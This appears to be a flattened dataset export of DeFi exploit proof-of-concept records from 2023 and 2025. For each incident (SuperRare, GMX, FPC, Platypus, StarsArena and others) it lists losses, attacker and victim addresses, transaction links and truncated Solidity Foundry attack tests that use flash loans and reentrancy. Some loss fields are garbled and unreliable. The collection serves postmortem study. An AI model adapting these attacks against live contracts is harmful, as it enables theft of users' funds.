https://etherscan.io/address/0xfFB512B9176D527C5D32189c3e310Ed4aB2Bb9eC
https://app.blocksec.com/explorer/tx/eth/0xd813751bfb98a51912b8394b5856ae4515be6a9c6e5583e06b41d9255ba6e3c1
https://x.com/SlowMist_Team/status/1949770231733530682
$730.0K
7.62
medium
SuperRare Exploit (2025-07)
true
true
true
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 285.7K USD // Attacker : https://etherscan.io/address/0xb750e3165de458eae09904cc7fad099632860b0f // Attack Contract : https://etherscan.io/address/0x1a61249f6f4f9813c55aa3b02c69438607272ed3 // Vulnerable Contra...
exploit_poc
unverified_54cd
2025-07
unverified_54cd_exp.sol
null
57486f61c9d67ff8
2026-01-07T10:59:16.541834
postmortems
ethereum
22,855,568
285.7K USD
285,700
https://etherscan.io/address/0xb750e3165de458eae09904cc7fad099632860b0f
https://etherscan.io/address/0x1a61249f6f4f9813c55aa3b02c69438607272ed3
https://etherscan.io/address/0x54cd23460df45559fd5feeaada7ba25f89c13525
https://app.blocksec.com/explorer/tx/eth/0xa57ec56af91ec70517ca71ca50101958d9c2ec9fdb61edcf35a9081c375725c2
https://x.com/TenArmorAlert/status/1941689712621576493
https://x.com/TenArmorAlert/status/1941689712621576493
true
true
false
high
285.7K USD
unknown
function testPoC() public { emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18); vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC(); attC.attack(); vm.stopPrank(); emit log_named_decimal_uint("after attack: bal...
true
285.7K USD
https://etherscan.io/address/0xb750e3165de458eae09904cc7fad099632860b0f
https://etherscan.io/address/0x1a61249f6f4f9813c55aa3b02c69438607272ed3
https://etherscan.io/address/0x54cd23460df45559fd5feeaada7ba25f89c13525
https://app.blocksec.com/explorer/tx/eth/0xa57ec56af91ec70517ca71ca50101958d9c2ec9fdb61edcf35a9081c375725c2
https://x.com/TenArmorAlert/status/1941689712621576493
https://x.com/TenArmorAlert/status/1941689712621576493
$285.7K
7.44
medium
unverified_54cd Exploit (2025-07)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~ 311.4 BNB // Attacker : https://bscscan.com/address/0xad2cb8f48e74065a0b884af9c5a4ecbba101be23 // Attack Contract : https://bscscan.com/address/0x1e2d48e640243b04a9fa76eb49...
exploit_poc
RANTToken
2025-07
RANTToken_exp.sol
null
fe315683fb0fefa4
2026-01-07T10:59:16.541888
postmortems
bsc
null
~ 311.4 BNB
311,400,000,000
https://bscscan.com/address/0xad2cb8f48e74065a0b884af9c5a4ecbba101be23
https://bscscan.com/address/0x1e2d48e640243b04a9fa76eb49080e9ab110b4ac
https://bscscan.com/address/0xc321ac21a07b3d593b269acdace69c3762ca2dd0
https://bscscan.com/tx/0x2d9c1a00cf3d2fda268d0d11794ad2956774b156355e16441d6edb9a448e5a99
null
https://x.com/Phalcon_xyz/status/1941788315549946225
true
true
false
critical
~ 311.4 BNB
unknown
function testExploit() public balanceLog { AttackContract attackContract = new AttackContract(); attackContract.start(); } receive() external payable { // Handle the received funds } } contract AttackContract { address attacker; uint256 borrowAmount = 2_813_769_505_544_453_...
true
~ 311.4 BNB
https://bscscan.com/address/0xad2cb8f48e74065a0b884af9c5a4ecbba101be23
https://bscscan.com/address/0x1e2d48e640243b04a9fa76eb49080e9ab110b4ac
https://bscscan.com/address/0xc321ac21a07b3d593b269acdace69c3762ca2dd0
https://bscscan.com/tx/0x2d9c1a00cf3d2fda268d0d11794ad2956774b156355e16441d6edb9a448e5a99
https://x.com/Phalcon_xyz/status/1941788315549946225
$311400.00M
8.09
high
RANTToken Exploit (2025-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "forge-std/Test.sol"; // @KeyInfo - Total Lost : 32,196.28 USD // Attacker : https://etherscan.io/address/0x657a2b6fe37ced2f31fd7513095dbfb126a53601 // Attack Contract : https://etherscan.io/address/0x7f1f536223d6a84ad4897a675f04886ce1c3b7a1 // V...
exploit_poc
SWAPPStaking
2025-07
SWAPPStaking_exp.sol
null
ee83ddee943b50ad
2026-01-07T10:59:16.541970
postmortems
ethereum
null
32,196.28 USD
32
https://etherscan.io/address/0x657a2b6fe37ced2f31fd7513095dbfb126a53601
https://etherscan.io/address/0x7f1f536223d6a84ad4897a675f04886ce1c3b7a1
https://etherscan.io/address/0x245a551ee0f55005e510b239c917fa34b41b3461
https://app.blocksec.com/explorer/tx/eth/0xa02b159fb438c8f0fb2a8d90bc70d8b2273d06b55920b26f637cab072b7a0e3e
null
https://x.com/deeberiroz/status/1947213692220710950
true
true
false
low
32,196.28 USD
unknown
function testExploit() public { exploit(); }
true
32,196.28 USD
https://etherscan.io/address/0x657a2b6fe37ced2f31fd7513095dbfb126a53601
https://etherscan.io/address/0x7f1f536223d6a84ad4897a675f04886ce1c3b7a1
https://etherscan.io/address/0x245a551ee0f55005e510b239c917fa34b41b3461
https://app.blocksec.com/explorer/tx/eth/0xa02b159fb438c8f0fb2a8d90bc70d8b2273d06b55920b26f637cab072b7a0e3e
https://x.com/deeberiroz/status/1947213692220710950
$32
9
high
SWAPPStaking Exploit (2025-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.22; import "forge-std/Test.sol"; import "../interface.sol"; interface IRewardRouterV2 { function mintAndStakeGlp(address _token, uint256 _amount, uint256 _minUsdg, uint256 _minGlp) external returns (uint256); function unstakeAndRedeemGlp(address _tok...
exploit_poc
gmx
2025-07
gmx_exp.sol
flash_loan
e5e92db0258766a0
2026-01-07T10:59:16.542146
postmortems
arbitrum
355,878,385
null
null
null
null
null
null
null
null
false
false
true
medium
null
flash-loan
function testExploit() public { console2.log("-------- attack before --------"); console2.log("eth balance of vault = ", weth_.balanceOf(address(vault_)) / 10 ** weth_.decimals()); console2.log("btc balance of vault = ", btc_.balanceOf(address(vault_)) / 10 ** btc_.decimals()); console2....
true
Unknown
6
medium
gmx Exploit (2025-07)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 4.7M USDT // Attacker : https://bscscan.com/address/0x18dd258631b23777c101440380bf053c79db3d9d // Attack Contract : https://bscscan.com/address/0xbf6e706d505e81ad1f73bbc0babf...
exploit_poc
FPC
2025-07
FPC_exp.sol
null
be98ec1633dfdf0d
2026-01-07T10:59:16.542285
postmortems
bsc
null
4.7M USDT
4,700,000
https://bscscan.com/address/0x18dd258631b23777c101440380bf053c79db3d9d
https://bscscan.com/address/0xbf6e706d505e81ad1f73bbc0babfe2b414ba3eb3
https://bscscan.com/address/0xb192d4a737430aa61cea4ce9bfb6432f7d42592f
https://bscscan.com/tx/0x3a9dd216fb6314c013fa8c4f85bfbbe0ed0a73209f54c57c1aab02ba989f5937
null
https://x.com/TenArmorAlert/status/1940423393880244327
true
true
false
critical
4.7M USDT
unknown
function testExploit() public balanceLog { // Step 1: borrow 23,020,000 USDT from Pancake Pool IPancakeV3Pool(PANCAKE_POOL).flash(address(this), 23_020_000 ether, 0, ""); }
true
4.7M USDT
https://bscscan.com/address/0x18dd258631b23777c101440380bf053c79db3d9d
https://bscscan.com/address/0xbf6e706d505e81ad1f73bbc0babfe2b414ba3eb3
https://bscscan.com/address/0xb192d4a737430aa61cea4ce9bfb6432f7d42592f
https://bscscan.com/tx/0x3a9dd216fb6314c013fa8c4f85bfbbe0ed0a73209f54c57c1aab02ba989f5937
https://x.com/TenArmorAlert/status/1940423393880244327
$4.70M
7.77
medium
FPC Exploit (2025-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~10 K usdt // Original Attacker : https://bscscan.com/address/0x726fb298168c89d5dce9a578668ab156c7e7be67 // Attack Contract : https://bscscan.com/address/0x756d614e3d277...
exploit_poc
MulticallWithETH
2025-07
MulticallWithETH_exp.sol
null
2cc992866731ad48
2026-01-07T10:59:16.542333
postmortems
bsc
55,371,342
~10 K usdt
10,000
https://bscscan.com/address/0x726fb298168c89d5dce9a578668ab156c7e7be67
https://bscscan.com/address/0x756d614e3d277baea260f64cc2ab9a3ac89877d3
https://bscscan.com/address/0x3da0f00d5c4e544924bc7282e18497c4a4c92046
https://bscscan.com/tx/0x6da7be6edf3176c7c4b15064937ee7148031f92a4b72043ae80a2b3403ab6302
null
null
true
false
false
medium
~10 K usdt
unknown
false
~10 K usdt
https://bscscan.com/address/0x726fb298168c89d5dce9a578668ab156c7e7be67
https://bscscan.com/address/0x756d614e3d277baea260f64cc2ab9a3ac89877d3
https://bscscan.com/address/0x3da0f00d5c4e544924bc7282e18497c4a4c92046
https://bscscan.com/tx/0x6da7be6edf3176c7c4b15064937ee7148031f92a4b72043ae80a2b3403ab6302
$10.0K
4.82
low
MulticallWithETH Exploit (2025-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~260K USD$ // Attacker : c0ffeebabe.eth (wihtehat) // Attack Contract : https://etherscan.io/address/0x3aa228a80f50763045bdfc45012da124bd0a6809 (Mev Contract) // Vulnera...
exploit_poc
WiseLending
2023-10
WiseLending_exp.sol
flash_loan
6270b302972c318a
2026-01-07T10:59:16.542380
postmortems
ethereum
18,342,120
~260K USD$
260,000
null
https://etherscan.io/address/0x3aa228a80f50763045bdfc45012da124bd0a6809
https://etherscan.io/address/0x84524baa1951247b3a2617a843e6ece915bb9674
https://etherscan.io/tx/0x7ac4a98599596adbf12fffa2bd23e2a2d2ac7e8989b6ea043fcc412a29126555
null
https://twitter.com/bbbb/status/1712841315522638034
true
true
true
high
~260K USD$
flash-loan
function testExploit() public { WBTC.approve(address(WiseLending), type(uint256).max); address[] memory tokens = new address[](1); tokens[0] = address(WBTC); uint256[] memory amounts = new uint256[](1); amounts[0] = 50 * 1e8; bytes memory userData = ""; Balancer....
true
~260K USD$
https://etherscan.io/address/0x3aa228a80f50763045bdfc45012da124bd0a6809
https://etherscan.io/address/0x84524baa1951247b3a2617a843e6ece915bb9674
https://etherscan.io/tx/0x7ac4a98599596adbf12fffa2bd23e2a2d2ac7e8989b6ea043fcc412a29126555
https://twitter.com/bbbb/status/1712841315522638034
$260.0K
10
high
WiseLending Exploit (2023-10)
true
true
true
false
import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$825000 US$ // Attacker : https://etherscan.io/address/0xA8Bbb3742f299B183190a9B079f1C0db8924145b // Attack Contract : https://etherscan.io/address/0xc74b72bbf904bac9fac880303922fc76a69f0bb4 // Vulnerable Contract : https://ethersca...
exploit_poc
Hopelend
2023-10
Hopelend_exp.sol
flash_loan
52ea73428e21e74a
2026-01-07T10:59:16.542453
postmortems
ethereum
18,377,041
~$825000 US$
825,000
https://etherscan.io/address/0xA8Bbb3742f299B183190a9B079f1C0db8924145b
https://etherscan.io/address/0xc74b72bbf904bac9fac880303922fc76a69f0bb4
https://etherscan.io/address/0x53FbcADa1201A465740F2d64eCdF6FAC425f9030
https://etherscan.io/tx/0x1a7ee0a7efc70ed7429edef069a1dd001fbff378748d91f17ab1876dc6d10392
null
null
true
true
true
high
~$825000 US$
flash-loan
function testAttack() public { deal(address(this), 0); approveAll(); address[] memory assets = new address[](1); assets[0] = address(WBTC); uint256[] memory amounts = new uint256[](1); amounts[0] = 2300 * 1e8; uint256[] memory modes = new uint256[](1); mo...
true
~$825000 US$
https://etherscan.io/address/0xA8Bbb3742f299B183190a9B079f1C0db8924145b
https://etherscan.io/address/0xc74b72bbf904bac9fac880303922fc76a69f0bb4
https://etherscan.io/address/0x53FbcADa1201A465740F2d64eCdF6FAC425f9030
https://etherscan.io/tx/0x1a7ee0a7efc70ed7429edef069a1dd001fbff378748d91f17ab1876dc6d10392
$825.0K
10
high
Hopelend Exploit (2023-10)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "./../basetest.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$14K // Attacker : https://bscscan.com/address/0x7ccf451d3c48c8bb747f42f29a0cde4209ff863e // Attack Contract : https://bscscan.com/address/0xa905ff8853edc498a2acddfdfac4...
exploit_poc
ZS
2023-10
ZS_exp.sol
null
dafd15a8f88a85eb
2026-01-07T10:59:16.542541
postmortems
bsc
null
~$14K
14,000
https://bscscan.com/address/0x7ccf451d3c48c8bb747f42f29a0cde4209ff863e
https://bscscan.com/address/0xa905ff8853edc498a2acddfdfac4a56c2c599930
https://bscscan.com/address/0x12b3b6b1055b8ad1ae8f60a0b6c79a9825bcb4bc
https://app.blocksec.com/explorer/tx/bsc/0xe2e87090f47c82eed3697297763edfad8e9689d2da7a4325541087d77432f54f
null
https://x.com/MetaSec_xyz/status/1711189697534513327
true
true
false
medium
~$14K
unknown
function testExploit() public { deal(address(this), 0.1 ether); deal(address(BUSDT), address(this), 0); // First tx AttackContract attackContract = new AttackContract{value: address(this).balance}(); vm.roll(block.number + 2); emit log_named_decimal_uint( "Exp...
true
~$14K
https://bscscan.com/address/0x7ccf451d3c48c8bb747f42f29a0cde4209ff863e
https://bscscan.com/address/0xa905ff8853edc498a2acddfdfac4a56c2c599930
https://bscscan.com/address/0x12b3b6b1055b8ad1ae8f60a0b6c79a9825bcb4bc
https://app.blocksec.com/explorer/tx/bsc/0xe2e87090f47c82eed3697297763edfad8e9689d2da7a4325541087d77432f54f
https://x.com/MetaSec_xyz/status/1711189697534513327
$14.0K
9
high
ZS Exploit (2023-10)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~280 ETH // Attacker : https://etherscan.io/address/0xce6397e53c13ff2903ffe8735e478d31e648a2c6 // Attack Contract : https://etherscan.io/address/0xe6c6e86e04de96c4e3a29...
exploit_poc
MaestroRouter2
2023-10
MaestroRouter2_exp.sol
null
0454a297573e0e70
2026-01-07T10:59:16.542608
postmortems
ethereum
null
~280 ETH
280
https://etherscan.io/address/0xce6397e53c13ff2903ffe8735e478d31e648a2c6
https://etherscan.io/address/0xe6c6e86e04de96c4e3a29ad480c94e7a471969ab
null
null
null
null
true
true
false
low
~280 ETH
unknown
function testExploit() public { cheats.rollFork(18_423_219); emit log_named_decimal_uint("Attacker Mog balance before exploit", Mog.balanceOf(address(this)), Mog.decimals()); address[] memory victims = new address[](7); victims[0] = 0x4189ad9624F838eef865B09a0BE3369EAaCd8f6F; vi...
true
https://etherscan.io/address/0xce6397e53c13ff2903ffe8735e478d31e648a2c6
https://etherscan.io/address/0xe6c6e86e04de96c4e3a29ad480c94e7a471969ab
$280
6.32
medium
MaestroRouter2 Exploit (2023-10)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$1.27M // Attacker : https://bscscan.com/address/0xfdbfceea1de360364084a6f37c9cdb7aaea63464 // Attack Contract : https://bscscan.com/address/0x216ccfd4fb3f2267677598f96...
exploit_poc
BH
2023-10
BH_exp.sol
flash_loan
9bd4449ced55e312
2026-01-07T10:59:16.542663
postmortems
bsc
32,512,073
~$1.27M
1,270,000
https://bscscan.com/address/0xfdbfceea1de360364084a6f37c9cdb7aaea63464
https://bscscan.com/address/0x216ccfd4fb3f2267677598f96ef1ff151576480c
https://bscscan.com/address/0xcc61cc9f2632314c9d452aca79104ddf680952b5
https://bscscan.com/tx/0xc11e4020c0830bcf84bfa197696d7bfad9ff503166337cb92ea3fade04007662
null
null
true
true
true
critical
~$1.27M
flash-loan
function testExploit() public { deal(address(BUSDT), address(this), 0); emit log_named_decimal_uint( "Attacker BUSDT balance before attack", BUSDT.balanceOf(address(this)), BUSDT.decimals() ); emit log_named_decimal_uint("Attacker BH balance before attack", BH.balanceOf(add...
true
~$1.27M
https://bscscan.com/address/0xfdbfceea1de360364084a6f37c9cdb7aaea63464
https://bscscan.com/address/0x216ccfd4fb3f2267677598f96ef1ff151576480c
https://bscscan.com/address/0xcc61cc9f2632314c9d452aca79104ddf680952b5
https://bscscan.com/tx/0xc11e4020c0830bcf84bfa197696d7bfad9ff503166337cb92ea3fade04007662
$1.27M
10
high
BH Exploit (2023-10)
true
true
true
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~1.8 WBNB // TX : https://app.blocksec.com/explorer/tx/bsc/0x0d13a61e9dc81cfae324d3d80e49830d9bbae300f760e016a15600889a896a1b // Attacker : https://bscscan.com/address/0x7cb74265e3e2d2b707122bf45aea66137c6c8...
exploit_poc
LaEeb
2023-10
LaEeb_exp.sol
flash_loan
988a850e0e388df2
2026-01-07T10:59:16.542718
postmortems
bsc
33,053,187
~1.8 WBNB
1.8
https://bscscan.com/address/0x7cb74265e3e2d2b707122bf45aea66137c6c8891
https://bscscan.com/address/0x9180981034364f683ea25bcce0cff5e03a595bef
null
null
null
null
true
false
true
low
~1.8 WBNB
flash-loan
false
https://bscscan.com/address/0x7cb74265e3e2d2b707122bf45aea66137c6c8891
https://bscscan.com/address/0x9180981034364f683ea25bcce0cff5e03a595bef
$2
4.15
low
LaEeb Exploit (2023-10)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$13K // Attacker : https://bscscan.com/address/0xcd03ed98868a6cd78096f116a4b56a5f2c67757d // Attack Contract : https://bscscan.com/address/0x502b4a51ca7900f391d474268c9...
exploit_poc
MicDao
2023-10
MicDao_exp.sol
flash_loan
d58494f2a470081c
2026-01-07T10:59:16.542759
postmortems
bsc
32,711,747
~$13K
13,000
https://bscscan.com/address/0xcd03ed98868a6cd78096f116a4b56a5f2c67757d
https://bscscan.com/address/0x502b4a51ca7900f391d474268c907b110a277d6f
null
https://bscscan.com/tx/0x24a2fbb27d433d91372525954f0d7d1af7509547b9ada29cc6c078e732c6d075
null
null
true
true
true
medium
~$13K
flash-loan
function testExploit() public { deal(address(BUSDT), address(this), 0); emit log_named_decimal_uint( "Attacker BUSDT balance before exploit", BUSDT.balanceOf(address(this)), BUSDT.decimals() ); DPPOracle.flashLoan(0, (BUSDT.balanceOf(address(DPPOracle)) * 99) / 100, address(...
true
~$13K
https://bscscan.com/address/0xcd03ed98868a6cd78096f116a4b56a5f2c67757d
https://bscscan.com/address/0x502b4a51ca7900f391d474268c907b110a277d6f
https://bscscan.com/tx/0x24a2fbb27d433d91372525954f0d7d1af7509547b9ada29cc6c078e732c6d075
$13.0K
8
high
MicDao Exploit (2023-10)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~2M USD$ // Attacker : https://snowtrace.io/address/0x0cd4fd0eecd2c5ad24de7f17ae35f9db6ac51ee7 // Attack Contract : https://snowtrace.io/address/0x44e251786a699518d6273e...
exploit_poc
Platypus03
2023-10
Platypus03_exp.sol
flash_loan
10855520ab1838d8
2026-01-07T10:59:16.542808
postmortems
avalanche
36,346,397
~2M USD$
2,000,000
https://snowtrace.io/address/0x0cd4fd0eecd2c5ad24de7f17ae35f9db6ac51ee7
https://snowtrace.io/address/0x44e251786a699518d6273ea1e027cec27b49d3bd
https://snowtrace.io/address/0xe5c84c7630a505b6adf69b5594d0ff7fedd5f447
https://snowtrace.io/tx/0x4425f757715e23d392cda666bc0492d9e5d5848ff89851a1821eab5ed12bb867
null
https://twitter.com/BlockSecTeam/status/1712445197538468298
true
true
true
critical
~2M USD$
flash-loan
function testExploit() public { WAVAX.approve(address(PlatypusPool), type(uint256).max); SAVAX.approve(address(PlatypusPool), type(uint256).max); address[] memory assets = new address[](2); assets[0] = address(WAVAX); assets[1] = address(SAVAX); uint256[] memory amounts ...
true
~2M USD$
https://snowtrace.io/address/0x0cd4fd0eecd2c5ad24de7f17ae35f9db6ac51ee7
https://snowtrace.io/address/0x44e251786a699518d6273ea1e027cec27b49d3bd
https://snowtrace.io/address/0xe5c84c7630a505b6adf69b5594d0ff7fedd5f447
https://snowtrace.io/tx/0x4425f757715e23d392cda666bc0492d9e5d5848ff89851a1821eab5ed12bb867
https://twitter.com/BlockSecTeam/status/1712445197538468298
$2.00M
9.39
high
Platypus03 Exploit (2023-10)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~1.4 ETH // Attacker : https://etherscan.io/address/0xea75aec151f968b8de3789ca201a2a3a7faeefba // Attack Contract : https://etherscan.io/address/0xf88d1d6d9db9a39dbbfc4b...
exploit_poc
pSeudoEth
2023-10
pSeudoEth_exp.sol
flash_loan
7a48627dceb25383
2026-01-07T10:59:16.542857
postmortems
ethereum
18,305,132
~1.4 ETH
1.4
https://etherscan.io/address/0xea75aec151f968b8de3789ca201a2a3a7faeefba
https://etherscan.io/address/0xf88d1d6d9db9a39dbbfc4b101cecc495bb0636f8
https://etherscan.io/address/0x2033b54b6789a963a02bfcbd40a46816770f1161
https://etherscan.io/tx/0x4ab68b21799828a57ea99c1288036889b39bf85785240576e697ebff524b3930
null
https://twitter.com/CertiKAlert/status/1710979615164944729
true
true
true
low
~1.4 ETH
flash-loan
false
~1.4 ETH
https://etherscan.io/address/0xea75aec151f968b8de3789ca201a2a3a7faeefba
https://etherscan.io/address/0xf88d1d6d9db9a39dbbfc4b101cecc495bb0636f8
https://etherscan.io/address/0x2033b54b6789a963a02bfcbd40a46816770f1161
https://etherscan.io/tx/0x4ab68b21799828a57ea99c1288036889b39bf85785240576e697ebff524b3930
https://twitter.com/CertiKAlert/status/1710979615164944729
$1
6.61
medium
pSeudoEth Exploit (2023-10)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$175K // Attacker : https://arbiscan.io/address/0x4843e00ef4c9f9f6e6ae8d7b0a787f1c60050b01 // Attack Contract : https://arbiscan.io/address/0x9e8675365366559053f964be58...
exploit_poc
BelugaDex
2023-10
BelugaDex_exp.sol
flash_loan
32c4f2b19d28f271
2026-01-07T10:59:16.542906
postmortems
arbitrum
140,129,166
~$175K
175,000
https://arbiscan.io/address/0x4843e00ef4c9f9f6e6ae8d7b0a787f1c60050b01
https://arbiscan.io/address/0x9e8675365366559053f964be5838d5fca008722c
https://arbiscan.io/address/0x15a024061c151045ba483e9243291dee6ee5fd8a
https://arbiscan.io/tx/0x57c96e320a3b885fabd95dd476d43c0d0fb10500d940d9594d4a458471a87abe
null
null
true
true
true
high
~$175K
flash-loan
function testExploit() public { deal(address(this), 0 ether); USDT.approve(address(SushiRouter), type(uint256).max); USDCe.approve(address(SushiRouter), type(uint256).max); address[] memory tokens = new address[](2); tokens[0] = address(USDT); tokens[1] = address(USDCe);...
true
~$175K
https://arbiscan.io/address/0x4843e00ef4c9f9f6e6ae8d7b0a787f1c60050b01
https://arbiscan.io/address/0x9e8675365366559053f964be5838d5fca008722c
https://arbiscan.io/address/0x15a024061c151045ba483e9243291dee6ee5fd8a
https://arbiscan.io/tx/0x57c96e320a3b885fabd95dd476d43c0d0fb10500d940d9594d4a458471a87abe
$175.0K
10
high
BelugaDex Exploit (2023-10)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$8K // Attacker : https://bscscan.com/address/0x8ebd046992afe07eacce6b9b3878fdb45830f42b // Attack Contract : https://bscscan.com/address/0x5366c6ba729d9cf8d472500afc1a...
exploit_poc
OpenLeverage
2023-10
OpenLeverage_exp.sol
null
adfc6b6b0df43d03
2026-01-07T10:59:16.542977
postmortems
bsc
32,820,951
~$8K
8,000
https://bscscan.com/address/0x8ebd046992afe07eacce6b9b3878fdb45830f42b
https://bscscan.com/address/0x5366c6ba729d9cf8d472500afc1a2976ac2fe9ff
null
https://bscscan.com/tx/0xd88f26f2f9145fa413db0cfd5d3eb121e3a50a3fdcee16c9bd4731e68332ce4b
null
null
true
true
false
low
~$8K
unknown
function testExploit() public { deal(address(this), 0 ether); emit log_named_decimal_uint("Attacker BNB balance before exploit", address(this).balance, 18); assertEq(openLeverageDeployer, RewardVaultDelegator.admin()); emit log_named_address("Original admin address (Open Leverage Deploy...
true
~$8K
https://bscscan.com/address/0x8ebd046992afe07eacce6b9b3878fdb45830f42b
https://bscscan.com/address/0x5366c6ba729d9cf8d472500afc1a2976ac2fe9ff
https://bscscan.com/tx/0xd88f26f2f9145fa413db0cfd5d3eb121e3a50a3fdcee16c9bd4731e68332ce4b
$8.0K
7.73
medium
OpenLeverage Exploit (2023-10)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~3M$ // Attacker : https://snowtrace.io/address/0xa2ebf3fcd757e9be1e58b643b6b5077d11b4ad7a // Attack Contract : https://snowtrace.io/address/0x7f283edc5ec7163de234e6a97f...
exploit_poc
StarsArena
2023-10
StarsArena_exp.sol
reentrancy
1b97c50377124727
2026-01-07T10:59:16.543031
postmortems
avalanche
36,136,405
~3M$
3,000,000
https://snowtrace.io/address/0xa2ebf3fcd757e9be1e58b643b6b5077d11b4ad7a
https://snowtrace.io/address/0x7f283edc5ec7163de234e6a97fdfb16ff2d2c7ac
null
https://snowtrace.io/tx/0x4f37ffecdad598f53b8d5a2d9df98e3c00fbda4328585eb9947a412b5fe17ac5
null
null
true
true
true
critical
~3M$
reentrancy
function testExploit() public { deal(address(this), 1 ether); emit log_named_decimal_uint("Attacker AVAX balance before exploit", address(this).balance, 18); (bool success,) = victimContract.call{value: 1 ether}( abi.encodeWithSelector(bytes4(0xe9ccf3a3), address(this), true, addre...
true
~3M$
https://snowtrace.io/address/0xa2ebf3fcd757e9be1e58b643b6b5077d11b4ad7a
https://snowtrace.io/address/0x7f283edc5ec7163de234e6a97fdfb16ff2d2c7ac
https://snowtrace.io/tx/0x4f37ffecdad598f53b8d5a2d9df98e3c00fbda4328585eb9947a412b5fe17ac5
$3.00M
7
medium
StarsArena Exploit (2023-10)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$8K // Attacker : https://etherscan.io/address/0x9b99d7ce9e39c68ab93348fd31fd4c99f79e4b19 // Attack Contract : https://etherscan.io/address/0xa6d35c97bd00b99a962393408a...
exploit_poc
kTAF
2023-10
kTAF_exp.sol
flash_loan
898bc133358c1a20
2026-01-07T10:59:16.543074
postmortems
ethereum
18,385,885
~$8K
8,000
https://etherscan.io/address/0x9b99d7ce9e39c68ab93348fd31fd4c99f79e4b19
https://etherscan.io/address/0xa6d35c97bd00b99a962393408aaa9eb275a45c5e
null
https://etherscan.io/tx/0x325999373f1aae98db2d89662ff1afbe0c842736f7564d16a7b52bf5c777d3a4
null
null
true
true
true
low
~$8K
flash-loan
function testExploit() public { emit log_named_decimal_uint("Attacker DAI balance before exploit", DAI.balanceOf(address(this)), DAI.decimals()); emit log_named_decimal_uint("Attacker TAF balance before exploit", TAF.balanceOf(address(this)), TAF.decimals()); address[] memory tokens = new addr...
true
~$8K
https://etherscan.io/address/0x9b99d7ce9e39c68ab93348fd31fd4c99f79e4b19
https://etherscan.io/address/0xa6d35c97bd00b99a962393408aaa9eb275a45c5e
https://etherscan.io/tx/0x325999373f1aae98db2d89662ff1afbe0c842736f7564d16a7b52bf5c777d3a4
$8.0K
8.97
high
kTAF Exploit (2023-10)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~827 USDC // Attacker : https://etherscan.io/address/0x7f284235aef122215c46656163f39212ffa77ed9 // Attack Contract :https://etherscan.io/address/0xba2aa7426ec6529c25a386...
exploit_poc
DePayRouter
2023-10
DePayRouter_exp.sol
null
f9844bf5a60e8740
2026-01-07T10:59:16.543142
postmortems
ethereum
18,281,130
~827 USDC
827
https://etherscan.io/address/0x7f284235aef122215c46656163f39212ffa77ed9
https://etherscan.io/address/0xba2aa7426ec6529c25a38679478645b2db5fa19b
https://etherscan.io/address/0xae60ac8e69414c2dc362d0e6a03af643d1d85b92
https://etherscan.io/tx/0x9a036058afb58169bfa91a826f5fcf4c0a376e650960669361d61bef99205f35
null
https://twitter.com/CertiKAlert/status/1709764146324009268
true
true
false
low
~827 USDC
unknown
false
~827 USDC
https://etherscan.io/address/0x7f284235aef122215c46656163f39212ffa77ed9
https://etherscan.io/address/0xba2aa7426ec6529c25a38679478645b2db5fa19b
https://etherscan.io/address/0xae60ac8e69414c2dc362d0e6a03af643d1d85b92
https://etherscan.io/tx/0x9a036058afb58169bfa91a826f5fcf4c0a376e650960669361d61bef99205f35
https://twitter.com/CertiKAlert/status/1709764146324009268
$827
6.66
medium
DePayRouter Exploit (2023-10)
true
true
true
false
